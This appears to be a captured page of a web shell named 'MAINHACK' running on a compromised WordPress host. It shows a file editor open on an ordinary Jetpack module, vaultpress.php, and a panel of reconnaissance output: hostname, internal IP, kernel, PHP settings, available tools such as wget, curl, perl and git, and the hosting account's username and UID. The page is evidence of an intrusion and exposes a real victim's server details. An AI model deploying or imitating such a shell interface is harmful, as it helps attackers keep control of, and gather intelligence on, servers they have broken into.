[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: vaultpress.php
<?php // phpcs:disable WordPress.WP.CapitalPDangit.Misspelled /** * Module Name: Backups and Scanning * Module Description: Protect your site with daily or real-time backups and automated virus scanning and threat detection. * First Introduced: 0:1.2 * Sort Order: 32 * Deactivate: false * Free: false * Requires Connection: Yes * Auto Activate: No * Feature: Security, Health * Additional Search Queries: backup, cloud backup, database backup, restore, wordpress backup, backup plugin, wordpress backup plugin, back up, backup wordpress, backwpup, vaultpress, backups, off-site backups, offsite backup, offsite, off-site, antivirus, malware scanner, security, virus, viruses, prevent viruses, scan, anti-virus, antimalware, protection, safe browsing, malware, wp security, wordpress security * Plans: personal, business, premium, security, complete */ add_action( 'jetpack_modules_loaded', 'vaultpress_jetpack_stub' ); /** * Conditionally enable module configuration. */ function vaultpress_jetpack_stub() { if ( class_exists( 'VaultPress' ) || function_exists( 'vaultpress_contact_service' ) ) { Jetpack::enable_module_configurable( __FILE__ ); add_filter( 'jetpack_module_configuration_url_vaultpress', 'vaultpress_jetpack_configure_url' ); add_filter( 'jetpack_module_free_text_vaultpress', 'vaultpress_jetpack_module_free_text' ); } } /** * Text for filter jetpack_module_free_text_vaultpress. */ function vaultpress_jetpack_module_free_text() { return __( 'Active', 'jetpack' ); } /** * URL for filter jetpack_module_configuration_url_vaultpress. */ function vaultpress_jetpack_configure_url() { include_once ABSPATH . '/wp-admin/includes/plugin.php'; return menu_page_url( 'vaultpress', false ); }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm010.cluster103.gra.hosting.ovh.net
Server IP: 10.103.20.10
PHP Version: 7.4.33
Server Software: Apache
System: Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: cuisinesj
User ID (UID): 17129
Group ID (GID): 100
Script Owner UID: 17129
Current Dir Owner: 17129